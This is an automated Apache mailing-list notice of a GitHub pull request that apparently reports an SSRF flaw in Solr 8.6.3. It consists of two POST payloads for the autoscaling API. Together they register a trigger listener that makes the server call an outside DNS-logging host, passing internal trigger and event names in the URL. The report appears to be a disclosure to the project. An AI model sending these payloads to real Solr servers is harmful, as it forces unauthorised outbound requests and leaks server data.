zhzhdoai opened a new pull request #1990: URL: https://github.com/apache/lucene-solr/pull/1990
**solr-8.6.3 SSRF** # 0x01 URL: http://localhost:8983/solr/admin/autoscaling POST: ``` {'set-listener': {'afterAction': ['execute_plan'], 'class': 'solr.HttpTriggerListener', 'header.X-Trigger': '${config.trigger}', 'name': 'test-to-flask', 'stage': ['ABORTED', 'SUCCEEDED', 'FAILED'], 'trigger': 'new2', 'url': 'http://mzen63.dnslog.cn/${config.name:invalidName}/${config.trigger}/${event.id}?STAGE=${stage}'} } ``` # 0x02 URL: http://localhost:8983/solr/admin/autoscaling ``` {"set-trigger": { 'event': 'scheduled', 'startTime':'NOW', 'every':'', 'name': 'new2', 'waitFor': '1s'} } ```  ---------------------------------------------------------------- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. For queries about this service, please contact Infrastructure at: us...@infra.apache.org --------------------------------------------------------------------- To unsubscribe, e-mail: issues-unsubscr...@lucene.apache.org For additional commands, e-mail: issues-h...@lucene.apache.org